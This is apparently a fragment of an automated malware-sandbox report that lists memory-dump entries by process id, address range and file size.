memory/2524-136-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/2524-137-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/2524-143-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/3060-242-0x0000000000000000-mapping.dmp
-
memory/3292-400-0x0000000000000000-mapping.dmp
-
memory/3312-403-0x0000000000000000-mapping.dmp
-
memory/3344-401-0x0000000000000000-mapping.dmp
-
memory/3352-402-0x0000000000000000-mapping.dmp
-
memory/3820-415-0x0000000000000000-mapping.dmp
-
memory/3868-418-0x0000000000000000-mapping.dmp
-
memory/3872-421-0x0000000000000000-mapping.dmp
-
memory/3980-430-0x0000000000000000-mapping.dmp
-
memory/4000-429-0x0000000000000000-mapping.dmp
-
memory/4152-411-0x0000000000000000-mapping.dmp
-
memory/4212-1216-0x00007FF6CD1B0000-0x00007FF6CDE49000-memory.dmpFilesize
12.6MB
-
memory/4212-1217-0x00007FF87D310000-0x00007FF87D4EB000-memory.dmpFilesize
1.9MB
-
memory/4212-470-0x00007FF6CD1B0000-0x00007FF6CDE49000-memory.dmpFilesize
12.6MB
-
memory/4212-780-0x00007FF87D310000-0x00007FF87D4EB000-memory.dmpFilesize
1.9MB
-
memory/4212-471-0x00007FF87D310000-0x00007FF87D4EB000-memory.dmpFilesize
1.9MB
-
memory/4212-779-0x00007FF6CD1B0000-0x00007FF6CDE49000-memory.dmpFilesize
12.6MB
-
memory/4236-215-0x0000000000000000-mapping.dmp
-
memory/4308-262-0x00007FF7DB5A0000-0x00007FF7DC239000-memory.dmpFilesize
12.6MB
-
memory/4308-300-0x00007FF87D310000-0x00007FF87D4EB000-memory.dmpFilesize
1.9MB
-
memory/4308-453-0x00007FF7DB5A0000-0x00007FF7DC239000-memory.dmpFilesize
12.6MB
-
memory/4308-206-0x0000000000000000-mapping.dmp
-
memory/4308-210-0x00007FF7DB5A0000-0x00007FF7DC239000-memory.dmpFilesize
12.6MB
-
memory/4308-454-0x00007FF87D310000-0x00007FF87D4EB000-memory.dmpFilesize
1.9MB
-
memory/4308-238-0x00007FF87D310000-0x00007FF87D4EB000-memory.dmpFilesize
1.9MB
-
memory/4312-465-0x0000000000000000-mapping.dmp
-
memory/4324-424-0x0000000000000000-mapping.dmp
-
memory/4388-122-0x0000000140000000-0x0000000140022000-memory.dmpFilesize
136KB
-
memory/4388-245-0x0000000140000000-0x0000000140022000-memory.dmpFilesize
136KB
-
memory/4388-173-0x0000000140000000-0x0000000140022000-memory.dmpFilesize
136KB
-
memory/4388-118-0x0000000140000000-0x0000000140022000-memory.dmpFilesize
136KB
-
memory/4388-121-0x0000000140000000-0x0000000140022000-memory.dmpFilesize
136KB
-
memory/4388-120-0x0000000140000000-0x0000000140022000-memory.dmpFilesize
136KB
-
memory/4388-119-0x0000000140003E0C-mapping.dmp
-
memory/4552-449-0x0000000000000000-mapping.dmp
-
memory/4772-557-0x0000000000AA0000-0x0000000000E01000-memory.dmpFilesize
3.4MB
-
memory/4772-809-0x0000000000AA0000-0x0000000000E01000-memory.dmpFilesize
3.4MB
-
memory/4772-778-0x0000000000AA0000-0x0000000000E01000-memory.dmpFilesize
3.4MB
-
memory/4772-930-0x0000000000AA0000-0x0000000000E01000-memory.dmpFilesize
3.4MB
-
memory/4912-425-0x0000000000000000-mapping.dmp
-
memory/5028-350-0x0000000000000000-mapping.dmp
-
memory/5028-355-0x0000023CC5DA0000-0x0000023CC5DC2000-memory.dmpFilesize
136KB
-
memory/5028-358-0x0000023CC5F50000-0x0000023CC5FC6000-memory.dmpFilesize
472KB
-
memory/6100-783-0x0000000000000000-mapping.dmp
-
memory/6100-798-0x00000296754C0000-0x00000296754DC000-memory.dmpFilesize
112KB
-
memory/6100-804-0x00000296759D0000-0x0000029675A89000-memory.dmpFilesize
740KB
-
memory/6100-838-0x00000296754E0000-0x00000296754EA000-memory.dmpFilesize
40KB
-
memory/6784-925-0x0000000000000000-mapping.dmp
-
memory/6796-926-0x0000000000000000-mapping.dmp
-
memory/6832-1175-0x000001AAF3CC0000-0x000001AAF3CDC000-memory.dmpFilesize
112KB
-
memory/6832-928-0x0000000000000000-mapping.dmp
-
memory/6832-1206-0x000001AADB289000-0x000001AADB28F000-memory.dmpFilesize
24KB
-
memory/6884-929-0x0000000000000000-mapping.dmp
-
memory/6920-931-0x0000000000000000-mapping.dmp
-
memory/6936-932-0x0000000000000000-mapping.dmp
-
memory/7004-938-0x0000000000000000-mapping.dmp
-
memory/7020-939-0x0000000000000000-mapping.dmp
-
memory/7052-941-0x0000000000000000-mapping.dmp
-
memory/7084-944-0x0000000000000000-mapping.dmp
-
memory/7124-949-0x0000000000000000-mapping.dmp
-
memory/7140-950-0x0000000000000000-mapping.dmp
-
memory/7152-951-0x0000000000000000-mapping.dmp
-
memory/7176-952-0x0000000000000000-mapping.dmp
-
memory/7192-953-0x0000000000000000-mapping.dmp
-
memory/7208-954-0x0000000000000000-mapping.dmp
-
memory/7228-955-0x0000000000000000-mapping.dmp
-
memory/8272-1207-0x00007FF76EA014E0-mapping.dmp
-
memory/8284-1208-0x0000000000000000-mapping.dmp
-
memory/8328-1212-0x0000000000000000-mapping.dmp
-
memory/8372-1213-0x0000000000000000-mapping.dmp
-
memory/8420-1221-0x00007FF632650000-0x00007FF632E44000-memory.dmpFilesize
8.0MB
-
memory/8420-1220-0x00007FF632650000-0x00007FF632E44000-memory.dmpFilesize
8.0MB
-
memory/8420-1214-0x00007FF632E425D0-mapping.dmp
-
memory/100172-268-0x000000000041972E-mapping.dmp
-
memory/100172-476-0x000000000A9D0000-0x000000000AB92000-memory.dmpFilesize
1.8MB
-
memory/100172-490-0x000000000BB00000-0x000000000BFFE000-memory.dmpFilesize
5.0MB
-
memory/100172-310-0x0000000009DB0000-0x000000000A3B6000-memory.dmpFilesize
6.0MB
-
memory/100172-305-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/100172-317-0x0000000009820000-0x000000000985E000-memory.dmpFilesize
248KB
-
memory/100172-329-0x0000000009AC0000-0x0000000009BCA000-memory.dmpFilesize
1.0MB
-
memory/100172-494-0x000000000B060000-0x000000000B07E000-memory.dmpFilesize
120KB
-
memory/100172-327-0x0000000009860000-0x00000000098AB000-memory.dmpFilesize
300KB
-
memory/100172-489-0x000000000AF00000-0x000000000AF76000-memory.dmpFilesize
472KB
-
memory/100172-488-0x000000000AE60000-0x000000000AEF2000-memory.dmpFilesize
584KB
-
memory/100172-480-0x000000000AC50000-0x000000000ACB6000-memory.dmpFilesize
408KB
-
memory/100172-477-0x000000000B0D0000-0x000000000B5FC000-memory.dmpFilesize
5.2MB
-
memory/100172-312-0x00000000097C0000-0x00000000097D2000-memory.dmpFilesize
72KB